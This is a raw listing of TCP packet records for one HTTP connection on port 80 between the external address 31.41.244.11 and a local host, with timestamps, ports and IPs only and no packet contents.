Dec 13, 2024 18:53:53.918456078 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.918514013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.919199944 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.919254065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.919357061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.919405937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.920201063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.920224905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.920263052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.920263052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.921255112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.921308041 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.921423912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.921473980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.922368050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.922529936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.922589064 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.923177958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.923237085 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.923434973 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.923506975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.924288034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.924340963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.924454927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.924501896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.925307989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.925358057 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.925462961 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.925507069 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.926440001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.926620960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.926671028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.927520990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.927577019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.927664042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.927712917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.928270102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.928380013 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.928437948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.929774046 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.929894924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.929936886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.929985046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.930603027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.930619001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.930661917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.930691957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.931443930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.931550980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.931606054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.932634115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.932704926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.932730913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.932761908 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.933456898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.933512926 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.933600903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.933656931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.934715986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.934731960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.934778929 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.934778929 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.935503960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.935570955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.935621977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.936356068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.936405897 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.936549902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.936609983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.937412977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.937460899 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.937510967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.937555075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.938395023 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.938514948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.938565969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.939388990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.939433098 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.939512014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.939564943 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.940402985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.940448999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.940546989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.940593004 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.941418886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.941462994 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.941601038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.941644907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.942430019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.942476988 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.942527056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.942572117 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.943429947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.943581104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.943634987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.944484949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.944534063 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.944590092 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.944636106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.945519924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.945568085 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.945755005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.945797920 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.946523905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.946571112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.946614981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.946836948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.952668905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.952739954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.952755928 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.952773094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.952799082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.952819109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953144073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953161001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953175068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953196049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953208923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953517914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953533888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953551054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953563929 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953566074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953578949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953591108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.953598022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953617096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.953623056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.955873966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.955924034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.956443071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.956458092 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.956473112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.956487894 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.956502914 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.956511974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.957000017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.957015038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.957029104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.957047939 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.957067013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.957081079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.957290888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.957336903 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.095484018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.095572948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.095628023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.095628023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.095963955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.096009016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.096091032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.096138000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.096242905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.096291065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.097152948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.097228050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.097238064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.097282887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.098201036 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.098273039 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.098335981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.098387957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.099210024 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.099263906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.099490881 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.099544048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.100198030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.100274086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.100295067 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.101185083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.101250887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.101294994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.101351976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.102224112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.102329969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.102395058 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.103257895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.103311062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.103523016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.103579998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.104311943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.104373932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.104511976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.104583979 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.105356932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.105465889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.105515003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.106473923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.106529951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.106586933 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.106642008 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.107466936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.107559919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.107608080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.108480930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.108531952 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.108542919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.108591080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.109446049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.109513998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.109560966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.109612942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.110475063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.110708952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.110763073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.111486912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.111541033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.111588001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.111639977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.112549067 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.112612963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.112659931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.112859964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.113363028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.113507986 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.113511086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.113560915 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.114423990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.114485979 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.114572048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.114622116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.115513086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.115643978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.115703106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.116610050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.116702080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.116763115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.117450953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.117511034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.117551088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.117610931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.118464947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.118516922 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.118540049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.118586063 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.119496107 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.119533062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.119554996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.119599104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.120495081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.120556116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.120588064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.120641947 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.121646881 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.121709108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.121732950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.121804953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.122699976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.122760057 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.122806072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.122855902 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.123616934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.123684883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.123758078 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.124115944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.124860048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.124908924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.124965906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.125016928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.125776052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.125842094 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.125883102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.126815081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.126877069 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.126961946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.127017021 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.127873898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.127990007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.128029108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.128030062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.128798008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.128850937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.129021883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.129328012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.129990101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.130052090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.130076885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.130130053 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.130934000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.130991936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.131098032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.131148100 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.131944895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.131995916 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.132041931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.132086992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.132997990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.133061886 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.133069992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.133119106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.133982897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.134047031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.134139061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.134190083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.134922981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.134974003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.135046959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.135150909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.135940075 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.135967016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.136018038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.136750937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.136805058 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.136950970 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.137005091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.137677908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.137742996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.137794971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.137881994 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.138734102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.138788939 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.138791084 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.138842106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.139688015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.139741898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.139779091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.139825106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.140750885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.140808105 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.140927076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.140978098 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.141752958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.141812086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.141860008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.142250061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.142810106 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.142858028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.142863989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.142898083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.143825054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.143886089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.144160032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.144215107 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.144927025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.144979954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.145070076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.145122051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.145972967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.146029949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.146676064 CET	80	49917	31.41.244.11	192.168.2.7
